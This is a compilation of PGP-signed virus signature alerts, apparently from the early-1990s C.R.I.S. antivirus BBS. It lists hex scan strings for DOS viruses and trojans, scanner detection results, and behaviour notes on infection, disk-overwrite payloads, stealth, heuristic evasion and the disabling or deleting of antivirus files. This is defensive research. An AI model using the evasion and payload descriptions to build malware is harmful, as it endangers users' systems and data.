Nothing remarkable about them except they were +written in Pascal and work unlike the Aftershock trojans. Part of +this code is identical to what I refer to as stepper trojans. They +start at drive ?? and work backwards to A. An interesting note is +the manner in which the header info was created. Hueristics bypass +the files. It is because of this header a signature can be made. +- ----------------------------------------------------------------------- + +[CrisSig] ESP +COM INF LOW +BB 16 01 CD 11 B8 ?2 BA ?1 00 2E 29 07 + +ESP - This is a resident companion infector of .Exe files. .EXEs will +have a companion .Com that is a mirror of the virus written. These +files are 519 bytes in length. They are hidden and read only. This +virus utilizes variable encryption. The decrypter is fairly static so +its easy to find. It appears to contain no destructive payload in this +and it only appears to replicate based upon the code. To clean a +system, simply delete the .Com campanion files found. +- ----------------------------------------------------------------------- + +[CrisSig] BIG_SKY {1) OR {2} +COM EXE INF +58 0E 50 51 E8 00 00 58 2D 14 00 B1 04 D3 +[CrisSig] BIG_SKY {2} OR {3} +COM EXE INF +26 ?2 84 00 26 ?2 86 00 EB 1F 26 ?2 4C 00 26 ?2 4E 00 + +Big-Sky 1,2,3 - I couldn't get these to do anything other than lock the +system. A disassembly didn't reveal any 80x86 specific code so all I can +assume is Jackel was trying to scare people based upon his Earthquake +trojans and AfterShock jokes. The code does try to hook Int 21 as a +minimum but not really sucessfully here nor 13 & 26. +- ----------------------------------------------------------------------- + +[CrisSig] ITALBOY +COM EXE INF +5E 83 EE 03 B8 01 F2 CD 21 3D F2 01 74 4E + +Italboy - I couldn't get this to replicate on the XT or the 486 no matter +what even though a quick glance at the code says it should work. The +following description is based upon a code analysis. 
This is basically +a resident .EXE file infector. It has a payload to overwrite the first +256 sectors of the hard disk. It hooks into Int 21 to trap the loading, +executing, and finding of programs. When it finds them, it will then +infect them. The provided signature may or may not work. If the message +" ITALY IS THE BEST COUNTRY IN THE WORLD " appears, your HD has +been overwritten. +- ----------------------------------------------------------------------- + +[CrisSig] NAKED-TRUTH +COM INF +5D 81 ED 0C 01 3E C6 86 F3 02 00 8D B6 05 + +Naked-Truth - This is a direct infector of Command.com and all .COMS. +It appears to do nothing other then replicate. It will attempt to +infect all .Coms in the current directory. If none are found, it will +step back through directories looking for .Coms to infect. Infected +files will show an increase in size of 451 bytes. Infected files will +continue to run. This like Italboy will overwrite the first 256 +sectors of the hard disk on the 11th of any month. +- ----------------------------------------------------------------------- + +[CrisSig] LOCKOUT {1} OR {2} +COM EXE BOOT INF +8C C8 FA 8E D0 BC 00 7C FB 2E 83 2E 13 04 + +Lockout 1 & 2 - These viruses are suppose to be BR infectors. The best +I could manage was a locked system. Their lockout is based upon CMOS +changes. If you have a saved copy of your MBR/PT and CMOS, this should +present no problems. + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + + + Verified that the sig for the Jizm Trojan is a valid false alarm. Seems +the trojan was originally a .bat compiled to an executable with an unnamed .Bat +to .Com utility. I've got a new sig that's keyed on the original bat contents +instead of the main code. I ran this three times on my system and no problems. +The new sig is. 
+ +[CrisSig] JIZM TROJAN +COM EXE TROJ +64 65 62 75 67 ?4 00 57 20 31 30 30 20 + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + +Files on "SHAREWARE 1 2 THE MAXX" & "GAMES 2 THE MAXX" CD-ROM DISK! + +I took a quick but decent gander at the archive. It's a nasty joker to +say the least. Unfortunately these some of these same files have been +floating around for awhile but under various names. Here's a quick rundown +of the archive contents. Those without a comment seem OK. + +MWARS BAT 129 07-17-92 6:27a Runs Readthis.com +MWARS20 EXE 28758 02-15-92 2:25a +MWARS20 DOC 6729 07-17-92 6:41a +NOTE DOC 687 01-01-80 12:17a +YANG ME 130 07-17-92 4:15p +INSTALL EXE 54272 06-14-90 4:57p Trojan to kill a PCB BBS +DEMO EXE 9728 04-22-90 8:45p Trojan to trash disk. +DOMENOW COM 4176 09-24-90 9:26p +READTHIS COM 9728 04-22-90 8:45p Trojan to trash disk. + + Note that demo.exe and readthis.com are identical +files but with different extensions. Sigs that will pick these up are. + +REVENGE TROJAN +COM EXE UATE TROJ +BA 2A 01 2E 89 16 F8 01 B4 30 CD 21 8B 2E 02 00 8B + +PCB KILLER TROJAN +EXE COM UATE TROJ +9A 00 00 99 0B 9A 87 04 E5 01 9A 9D 04 E5 01 33 + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLWV8b6M4CDusTF+9AQER9gIAmm/m0S8V7TYUU1kVkAd0yEpRlSqZsZvH +KKFNdFn0KEGoAoaTT+eNfxjuYTbGrOpeiM9QWn0B9uwlGs5lxE2hMg== +=yZzJ +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +Virus Signature Alert! + +- --------------------------------------------------------------------- +Virus Name: [CrisSig] [Data-Rape] 2.1 (Trojan) + Notes: COM EXE TROJ + Signature: BB 03 01 B5 00 B1 00 B6 00 B2 80 CD 13 73 11 + +[ ] F-Prot 2.10C [ ] TBAV 6.09 [ ] SCAN 9.20 V109 + +None of the above scanners detect this file as of yet. +If you add the above signature to your scanner, it will be detected. 
+ +This is a simple trojan and not a virus. It can be mistaken for +one though since it writes itself to the hard disk plus whatever was +in memory at the time. It was written by Zodiac and Data Disrupter +back in 1991 as part of the Rabid group. + +This is part of the info that will be written to disk. +It'll attempt to overwrite no less than the first 69 sectors of +the harddisk. It'll then go after any floppy in the A drive to do +the same. Because of the manner it attempts to overwrite the hard +disk, most XT's HD's shouldn't be affected. Partly depends on the BIOS +and use of Int 13. A standard XT will not all a Long Sector write. + +Bill Dirks +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] Sabbath {Generation 1} + Notes: COM EXE INF + Signature: 1E 75 13 B0 02 B9 20 00 33 D2 CD 26 + +Virus Name: [CrisSig] Sabbath + Notes: COM EXE INF +Signatures: TBAV: B9 43 03 81 3L ?2 83 02 E2 F7 + SCAN: "B94303813L??8302E2F7" [Sabbath] + F-PROT: B94303813L????8302E2F7 + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +This virus goes TSR. It will basically try to infect anything but the +boot sector. Doesn't matter whether it's executable or not. It does a find +first and goes after the file if not already infected. It captures the +critical error handler so it isn't obvious what it does when it messes up. + +The virus will infect the first file in the directory. There are several +bugs in the code. One of them is that it will infect a file more than once. +This causes problems in detection. What will typically happen is the file +will become infected. It is easily detected at this point. Upon running it +again, it may or may not damage itself by reinfecting the same file. +Basically, if the infection is valid, the strings above will detect it. +Once the virus kills itself by damaging the file, the file is no longer +infectious or executeable but no longer detectable due to the damage. 
+ +Bill Dirks +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] Quadratic Equation II (Generation 1) + Notes: EXE COM LOW DROP + Signature: BD 00 00 1E 06 B4 3F BB FF FF CD 21 3D FF + +Virus Name: [CrisSig] Quadratic Equation II + Notes: EXE COM LOW INF +Signatures: TBAV: BH DA 04 2E 30 ?2 E2 FA + SCAN: "BHDA042E30??E2FA" [Quadratic Equation II] + F-PROT: BH DA 04 2E 30 ?? ?? E2 FA + +[M] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +None of the above scanners detect this Virus as of yet. +If you add the above signature to your scanner, it will be detected. + +Quadratic Equation II is a memory resident com and exe infector that +will become memory resident when the first infected file runs. When +the virus is memory resident it will infect any com or exe file that +is run. (Including command.com) There will be no time or date changes. +Infected files will change in size 15 bytes while the virus is active +in system memory, if the virus is removed from memory the files will +show the true size change of 1285 bytes. The signatures above have been +tested and proved to work on all tested files. + +Michael Paris +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] YB-5 (Handsome) + Notes: COM INF + Signature: EB 00 C3 8D 94 8E 01 B4 4E B9 3F 00 CD 21 + + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +YB-5 is a com infector that adds 466 bytes to infected files. The source +code claims "AUTHOR: Khntark; surgeon: Urnst Kouch". This virus is a +demonstrator for the YB-5 code segment. It is sufficient to get by +F-Prot's 'heuristic'mode, but does not get past TBScan's heuristic mode. +TBScan reports a possible infection. + +The above signature works on all samples tested here. By adding this +signature you will be able to detect this virus and all infected files. 
+ +Michael Paris +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] DK - (Generation 1) + Notes: EXE COM DROP + Signature: 83 EC 10 83 E4 E0 8B EC 50 BE 05 01 03 36 + +Virus Name: [CrisSig] DK + Notes: EXE COM INF +Signatures: TBAV: B9 B6 01 BB ?2 2E 81 07 ?2 83 C3 02 E2 F6 + SCAN: "B9B601BB??2E8107??83C302E2F6" [DK] + F-PROT: B9B601BB????2E8107????83C302E2F6 + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +Note: The first generation signature is known to give a false positive +in some cases, The DK infection has been tested with none. Both signatures +worked on all files infected and tested here. + +The DK virus is a encrypting, non-memory resident, non stealth virus +The first time a file infected with the DK virus is executed the systems +date will be changed to 1994 and two files in the current directory will be +infected, one EXE and one COM. If the virus can't find two uninfected files +then it will search for alternate directories. The DK virus is no real +threat because it does no real damage except infecting files which currently +have to be deleted to clean the virus off of the system and change in the +system date from XX/XX/XXXX to XX/XX/1994. Due to this fact the viruses +presence can be easily detected also Viruscan identifies it as the TridenT +virus. + +I have created a signature for this virus which can easily detect it +by using McAfees Viruscan. This signature is "B9B601BB??2E8107??83C302E2F6" +these are the bytes which remain constent after the encryption of the virus +each time. I have tested it and it doesn't seem to have any conflicts with +any other programs. + +Shaun Debow +- --------------------------------------------------------------------- + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 (BBS) + +* These signature's have passed all testing and worked on all + files that were infected and tested. 
+ +REMEMBER F-prot will only allow 10 user sigs at a time, Scan under 250 +TBAV will allow Over 1,500. + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLR6AhqM4CDusTF+9AQGbaQH/Zo64j/KsVJcjUX4rayxYZQXaILvJlCRW +I9LUNA0J3YxYj/Wrz3gmECUU+bohF9U3IK73ZiNUQTnUdvpTR1ZqnA== +=raZ2 +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S. New Virus Signature Warning (CrisInfo.008) + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] Acid Trip + Notes: EXE COM LOW INF + Signature: 81 F9 00 0C 75 21 B4 0F CD 10 3C 03 75 19 + +If you add the above signature to your scanner, it will be detected. + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. + +Acid Trip is a resident .EXE infector. (You will need to include .COM +infection if you want it to pick up to original Acid Trip). It infects upon +file execution. Infected files will have a file size increase of 694 bytes, +however this increase will be hidden while the virus is resident in memory. +The Acid Trip virus will at 12:00pm of any day cause the monitor to rapidly +scroll through the color pallete. It will display the following message" +Your PC is on an [Acid Trip]... try again later... +However on the test system the virus just displayed the message and then +hung the system, so you might get varied results on varied hardware. The +virus contains no intentionally damaging code. The virus contains the +following messages: +Crypt Keeper P/S Your PC is on an [Acid Trip]... Try again later... + +William Chapman [Cris] + +- ------------------------------------------------------------------------- +Virus Name: Greetings Virus + Notes: COM EXE LOW INF + Signature: E8 00 00 5D 81 ED 03 00 E8 + +If you add the above signature to your scanner, it will be detected. 
+ +Scanning Results +- ------------------------------------------------------------------------- +TBAV 6.10 - Undetected +Mcafee's ViruScan Version 111 - Undetected +File had to be deleted +Norton Antivirus Version 3.0 - Undetected +File had to be deleted +F-Prot Ver 2.10c - Unknown Virus (Original File Only) + Note: Infected Files Not Detected +File had to be deleted +Virus Terminator - Undetected +File had to be deleted +VirusCure - Undetected +File had to be deleted +- ------------------------------------------------------------------------- +Extra Information Found on Greetings Virus +- ------------------------------------------------------------------------- +Virus : The Greetings Virus +Author / Modification By : Admiral Bailey +Language Used : Assembly Language [TASM 2.0] +Type of Virus : Encrypted TSR com/exe infector. +Date Of Release : 1-2-93 + +- ------------------------------------------------------------------------- +Some Notes: +This is a TSR com/exe infector. Between certain times it will display +a bouncing ball. Both on graphics (which it will ruin) and in text. +When you reboot during a certain time it shall display a certain messege. +Researchers Notes +The Greetings virus infects Com and Exe files and is memory resident. The +virus uses 2.2 K of RAM. On execution of the original virus Com file, the +words (Hello World...) will be displayed. Interrupts hooked are 08,09, and +21. The Greetings virus will infect the Command.Com file if executed. The +words (Hello World...) can't be found in infected files or in memory. +- -------------------------------------------------------------------------- +Interrupt 08 System Timer. + +Interrupt 09 Keyboard Hardware. +This Interrupt is invoked anytime a key is pressed and released. +The Greetings virus will lock up the keyboard. + +Interrupt 21 DOS Functions. Allows the virus to use over 100 functions. + +Infection +Infected Com and Exe files will have an increase in file size of 1,118 +bytes. 
The virus will only infect the Command.Com file if executed. +Infected files have no change to date and time. + +Encryption +Encryption by this virus is fairly good, but the scan string below +for TBAV will detect all files infected with the Greeting virus. +(including encrypted files and original virus com file) + +Testing +The only signs of infection by the Greetings virus is file growth and +memory loss of 2.2k. + +Summary +Greetings is a typical computer virus. Nothing unusual occured during +testing. According to the text that the virus came with, a ball will be +displayed on the screen. I changed the date and time around some, but +still couldn't activate it. I wasn't really impressed, but of course +my idea of a great virus would be one that reaches out of the screen +and grabs you by the neck. A virtual reality virus maybe. Just kidding. + +Prosperous Researching. +Larry Shultz (C.R.I.S) + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] CMAGIC/fx + Notes: COM INF LOW + Signature: 5D 81 ED 13 00 8B F5 81 C6 0E 00 8A 14 8A 64 01 8B + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : seems to be infected by an unknown virus. + SCAN V111 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +- ------------------------------------------------------------------------- +This virus is a resident .COM infector. It will hook the 21st interupt and +infect any .COM file opened. It appears to contain no destructive code. The +virus is fairly noticable because it makes noises from the PC speaker. These +noises concist of a couple different sounds which last about 5 seconds. +Infected file will have a growth of 2015 bytes however the virus will hide its +size during a directory command while resident in memory. 
The virus contains +the following message -- [CMAGIC/fx] By Mnemonix V 1.00 1994 + +William Chapman (C.R.I.S) +- -------------------------------------------------------------------------- + +Virus Name: [CrisSig] JIZM TROJAN + Notes: COM EXE TROJ + Signature: 8B D6 33 C9 B8 02 3C 0B FF 74 02 FE C4 CD 21 + +If you add the above signature to your scanner, it will be detected. + +666-JIZM - contains three files. INSTAL_C.COM, YANKEES.COM and +TROJAN.COM. The first two files are simply The Draw saved screens and are +harmless. The file Trojan.com is a trojan to overwrite the first sector of +drive C: by calling and using debug to create and run a file. It goes +under the premise of updating certain The Draw functions. The file is +easily hackable and the signature included takes this into account. + +Bill Dirks (C.R.I.S) + +- -------------------------------------------------------------------------- +Virus Name: [CrisSig] ENEMY or [ACIDTRIP] + Notes: COM EXE LOW INF + Signature: 8E C0 48 8E D8 C7 06 01 00 08 00 EB 14 58 50 8E C0 + +If you add the above signature to your scanner, it will be detected. + +This is the Enemy Within virus written by Crypt Keeper of P/S. +This is a resident infector of programs. It hooks Int 21 when it goes TSR +and monitors 2F. It does a call to an undefined function to determine it's +presence. It also leaves a file marker to determine infected files. It infects +.EXE's only with a file increase of 644 bytes. Memory is reduced by 1040 bytes. +This program is semi-stealth insomuch while TSR, infected file sizes look the +same, file date/time stamps remain unchanged and it seems it performed its +infections normally after a file terminates execution. This appears to be done +with the PS-MPC or similar virus construction kit. + +ACIDTRIP - The Acid Trip virus written by Crypt Keeper of P/S. is virtually +identical to the Enemy Within virus except it is suppose display a msg to +the screen. 
File increase is 694 bytes and memory is reduced by 1364 bytes. + +Bill Dirks (C.R.I.S) +- -------------------------------------------------------------------------- + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLVWE46M4CDusTF+9AQGQUAH/Shz56Rds37PSa032jhFF+C1WlmeiXQ6k +Uu+5yeXK0FYeOACM13dQ+9xp0JP/kezraxsLh0dMi4+BTjMVMB4+aQ== +=60gD +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S. New Viruses - Signature Warning + +- - ------------------------------------------------------------------------------ +Virus Name: [CrisSig] Dieted Nichols Dropper + Notes: COM EXE DROP + Signature: 73 F3 A6 C3 E4 E3 FF 11 02 E9 CD 20 + +Virus Name: [CrisSig] New Nichols + Notes: BOOT INF + Signature: TBAV EB 23 ?@23 FA 33 C0 8E D0 + SCAN EB 23 *(23) FA 33 C0 8E D0 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +NICHOLSD - +This is the dropper for the Nichols virus. It will infect the MBR +of floppies. Once done, infected floppies will infect hard disks. It stores +the original boot sector so the system remains bootable. It was written by +Apache (of ARCV?). It seems to have no payload and is only meant as a +nuisanse. The dropper program is Dieted. The virus itself is not encrypted. +It will momentarily display [Nichols] by Apache. 
+ +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Addict9 + Notes: COM EXE LOW INF + Signature: 2E A1 6C 05 2E 0B 06 6E 05 58 75 07 9C 2E + +F-Prot 2.10C : Infection: _1364 - Modified (700 extra bytes) + TBAV 6.10 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +ADDICT9 - +This is a resident infector of executables to include Command.Com. It +will infect .COM & .EXE files and leave them runnable. +It does have a payload and unique activation routine. As the virus passes +from one machine to another, it stores and compares BIOS data. When it is +on a new machine, it increments an internal counter which is saved. After +255 seperate machine infections, a routine to overwrite the first 64 +sectors of drive C will be called. Infected files increase in size by +1364 bytes. The original date/time stamp is maintained. The virus will +tunnel to get the original INT 21 but doesn't employ any real stealth +techniques. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] 44 {43} Trivial + Notes: COM INF + Signature: B4 4E 33 C9 BA 25 01 CD 21 B8 02 3D BA 9E + + + F-Prot 2.10 : Seems to be infected by an unknown virus. + TBAV 6.10 : Infected by Trivial {1} + SCAN V108 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +44{43} Trivial is a non-resident .C* overwriting virus which is greater than +43 bytes in size. The source code claims that the virus is 44 bytes however +when compiled it is acutally only 43. The virus does have a bug that upon +execution it does infect all .C* files in the directory, but it prints garbage +(actually itself) to the screen and the the system hangs. 
+It was written by Dark Helment. + +William Chapman (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] MAX + Notes: COM EXE BOOT INF + Signature: E8 03 00 ?3 5D 0E 16 58 59 33 C8 75 37 B8 01 02 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +This virus is a funny little thing. For how simple it is, it has kept our +researchers busy. MAX is a new virus from Memory Lapse [P/S]. When first +sent to us it had some claims that we had to check out right away. First +it was sent up as a simple memory resident .COM infector. One researcher +had a quick look at it and said [BOOT VIRUS]. + +Later we were told that it would format a drive on 10/29. We checked this +out to be not true. Memory Lapse has out done himself with this one, his +pratice on all of those 'clean programmed' .com and .exe memory resident +viruses has brought him to the place of writing something new, and here +it is ... There were many other claims and false panic alarms on this file, +but here is the scoop. + +MAX - Once a dropper file is run on the PC this file will infect the MBR of +the hard disk. The virus will not go memory resident at this time, nor will +it infect any files. Once the machine is rebooted the virus will go memory +resident and start infecting .COM files adding 347 bytes to infected files. +There will be no time or date changes on infected files. Note also that it +worked here just fine on all machines tested. Also with different versions +of DOS we had no problems infecting bait files. This virus spreads like wild +fire. One researcher here had a problem making it work on his IBM XT eith two +different versions of DOS. 
(Everyone else testing it using AT's with no +problem at all) + +The signature above will detect the virus both in the MBR and ALL infected +files on the hard disk. + +Michael Paris (C.R.I.S) +- - ------------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) CRISMCAF (SCAN CrisSig) +ͼ + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuEfqM4CDusTF+9AQEX/wH8DFmLyPtbrZSPc6ibxxTEsWPm+ehPJTvp +UeEIlrmw4vRYqgvGTvcIFXMeTsuNlcrEK/FeIsqpAx7G1K7cz5/x0g== +=t+GS +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +New Virus - Signature Warning + +- - ------------------------------------------------------------------------------ +Virus Name: [CrisSig] Jackel5a + Notes: COM EXE ATE INF + Signature: 0E ?3 0l ?6 Ch + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V109 : Infected items: 00 + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +JACKEL5A - +This is a simple dropper that really doesn't spread well at all. The only +file I could get it to infect was format.com and files that called/used it. +The threat from this spreading on a system is practically nil due to bugs in +the code. It will however do quite a few things well that are noteworthy. +Namely, they open you up to other virus attacks. It will upon execution +disable Central Points resident AV code (VSAFE and probably also MSAV by MS). 
+ +It will then delete the following files created by other AV packages. +Antivir.dat, Chklist.cps, *._??, and Scanval.val. It also has a null routine +to activate a yet to be included routine on the 13th of any month. +Also, this thing looks for it's own signature effectively in files and +memory, but it won't prevent multiple reinfections of an already +infected file 50% of the time. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Mordor File infector + Notes: COM EXE BOOT HIGH INF + Signature: 0E 1F BF 1A 01 80 3D BA 74 10 B9 56 04 BF 1A 01 + +Virus Name: [CrisSig] Mordor Boot infector + Notes: BOOT INF + Signature: 9C 50 51 52 1E 06 B4 CD 1A 80 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : infected by Mordor virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +MORDOR - This is a nasty little virus. It is encrypted but keeps a fairly +static decryptor. It starts off by disabling VSAFE/VWATCH. It then checks to +see if it is resident. It does this by checking Int 21-DA which is normally +used by Basic/Basica. It will go upon various factors, while resident and at +other times remove itself. When it goes resident, you will normally lose the +function of the highest placed TSR/Driver. SCSI users will probably lose access +to their SCSI devices when Mordor is active due to the area it overwrites as a +work area (TOM). Possible video skewing also. When active, it will overwrite +code starting at segment 9F80. On March 31st it will display a message. If you +see this message it is important. The following day/month, April will activate +it's destruction routine. This routine will overwrite tracks 0-17 on heads 0-4 +with whatever info is sitting in 5000:5000 in memory. 
It will reboot (semi- +cold) the system at this time using the infection code to ensure complete +obliteration of data (FAT+). It looks like it will infect/overwrite any +executable. It does trap Int 21 (Dos services) & 24 (Critical Error Handler). +Except for Mar 31st and the month of April, it appears to try and do nothing +other than spread. Multidisk systems should only have drive C (1st hard disk) +affected by the destruction routine since their is no drive stepping routine. +Fromn the routines I saw, it can best be desribed as semi-stealth. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] Dementia Pracecox 2.0 + Notes: COM INF + Signature: 5D 81 ED 14 01 8B F5 81 C6 38 01 8B DD 81 + +F-Prot 2.10 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : probably infected by an unknown virus + SCAN V108 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Dementia is a non-resident infector of .COM files that will change +infected files 609 bytes. Dementia 2.0 will also infect all .COM files +in the directory one up from the current directory with no date or time +changes made to infected files. This virus contains the message [DR/2] +Dementia Praecox by Mnemonix + +William Chapman (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] PET (ARCV) TROJAN + Notes: COM EXE ATE DROP + Signature: 90 90 BA AC 02 33 C9 B8 02 3C CD 21 93 B4 40 + +Virus Name: [CrisSig] PET (ARCV) TROJAN + Notes: COM FND TROJ + Signature: B0 02 B9 FF 00 33 D2 CD 26 B0 03 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. 
+- - ------------------------------------------------------------------------------ +PET - +This is more a trojan than a virus. The only files it will actually +infect in any matter is a:\command.com , a:\dos\command.com , and +a:\windows\win.com. It does this by truncating the files and trojanizing +them. The new file length is about 38bytes. The trojan code is designed to +overwrite the first 255 sectors of drives C thru F. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] HSPAWN + Notes: COM INF + Signature: E9 01 02 AC 0A C0 75 FB 81 7C FC 45 58 74 3E 81 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +HSPAWN - +This is a very agressive resident spawning/companion type virus. When an +.EXE file is executed, a companion .COM is created containing an exact +image of the virus. The size of these files is 1115 bytes and are hidden. +This virus does incorporate some stealth techniques that prevent most +TSR AV software from detecting it's presence and actions while active. It +is a little picky about its environment. Depending upon device drivers +loaded, it may lock the system when it attempts to go TSR. Cleaning a +system of this involves deleting all the hidden .COMs created. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + +Virus Name: [CrisSig] OSPRING - (First Generation) + Notes: COM EXE INF LOW + Signature: BB 11 01 53 C3 E9 E9 20 BB 11 01 53 C3 E9 E9 36 + +Virus Name: [CrisSig] OSPRING (089) + Notes: COM EXE INF LOW + Signature: ?1 09 ?2 C3 E9 E9 ?2 BH 37 ?1 90 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. 
+ TBAV 6.10 : Infected items: 00 + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. +- - ------------------------------------------------------------------------------ +OSPRING - This is a resident direct infector of .COM files and a spawns +companion .COMs for .EXE files. It uses a variable encryption scheme and +generates a certain amount of polymorphism. It was intentionally designed to +attempt to bypass hueristic scanning. File size increases of .COM file +infections varies and is typically around 1570 bytes. Spawned .COMs are an +image of the virus and appx. the same length. Spawned companion .COM files are +made read only and hidden. 5 files will be infected each time an infected file +is run. It is semi-stealthy. No real tunneling. Files will retain their +original date/time stamp and by using hidden companion .Com files, a little +hard to detect. It will kill Antivir.dat and Chklist.* files. It will not +infect Command.Com. + +Bill Dirks (C.R.I.S) +- - ------------------------------------------------------------------------------ + + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 
60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) CRISMCAF (SCAN CrisSig) +ͼ + +- -----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuBnqM4CDusTF+9AQFYzQH8D9UoT/qpTIQoHwX5ue2p2U7n4VMCx6dN +77MgIr+RtqG+otmMAe6muutt9PcwESLjXESEbx5x3EUsrhCsItU/3A== +=Hq0x +- -----END PGP SIGNATURE----- + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTuEhqM4CDusTF+9AQFT2gH/ffwdf9uwtT9b6NEqJe31YfnUC4DHoOSF +NKlEbejobhPjyAdF0abKcvDLB8NXO4Rn6/3nquZNwYR3cARUsKncoA== +=jklc +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +- ------------------------------------------------------------------------ +C.R.I.S. New Virus Signature Warning (CrisInfo.013) +- ------------------------------------------------------------------------ + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV (Works With REGISTERED VERISONS ONLY) + +CrisSigs are made at no charge to anyone that wants to use them. They +are not ment as positive 100% infection protection. CrisSigs serve the +user that wants to have that 'extra' protection until the virus is added +to the scanner they are using. + +In the history of CrisSigs there have been (3) signatures that have given +warnings on files that were not infected but claimed to be on some files +that were scanned. By using CrisSigs the chance is there to get a false +virus warning but we feel it is better safe then the chance of loosing +your files or hard disk. + +All of the CrisSigs have been tested to work on the viruses below and +have been tested for false alarms and found none. 
